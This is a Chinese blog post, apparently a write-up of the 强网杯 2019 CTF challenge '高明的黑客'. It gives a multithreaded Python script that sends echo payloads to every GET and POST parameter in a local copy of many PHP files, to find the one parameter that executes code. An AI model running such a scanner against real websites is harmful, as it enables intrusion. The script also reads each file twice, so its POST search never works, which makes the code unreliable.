[强网杯 2019]高明的黑客

下下来文件很多
用多线程脚本去跑

点击查看代码 
# import re
# #正则表达式的模块
# import os
# import requests

# files=os.listdir('E://phpstudy/phpstudy_pro/WWW/src')
# reg=re.compile(r'(?<=_GET\[\').*(?=\'\])')
# for i in files:
#     url='http://127.0.0.1/src/'+i
#     f=open('E://phpstudy/phpstudy_pro/WWW/src/'+i)
#     data=f.read()
#     f.close()
#     result=reg.findall(data)
#     for j in result:
#         payload=url+'?'+j+'=echo *****'
#         print(payload)
#         html = requests.get(payload)
#         if '*****' in html.text:
#             print(payload)
#             exit(1)


import os
import requests
import re
import threading
import time


print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))   #只是一个简单的时间函数,看起来更漂亮罢了
s1=threading.Semaphore(100) #这儿设置最大的线程数

filePath=r'E://phpstudy/phpstudy_pro/WWW/src'
os.chdir(filePath)
requests.adapters.DEFAULT_RETRIES = 5								#设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath) #打开载入文件
session = requests.Session()
session.keep_alive = False

def get_content(file):
    s1.acquire()#锁定线程防止资源共享
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:							#打开php文件,提取所有的$_GET和$_POST的参数
        gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
        posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}														#所有的$_POST
    params = {}	                                                    #所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url='http://127.0.0.1/src/'+file
    req = session.post(url, data=data, params=params)
    req.close()	#一定要记得关小心暴了
    req.encoding = 'utf-8'
    content = req.text
    #print(content)
    if "xxxxxx" in content:									#如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()												# 关闭请求  释放内存
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()												# 关闭请求  释放内存
                if "xxxxxx" in content:
                    break
        if flag == 1:													#flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:															#加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()
posted @ 2023-04-02 14:13  Dr0se  阅读(2)  评论(0)    收藏  举报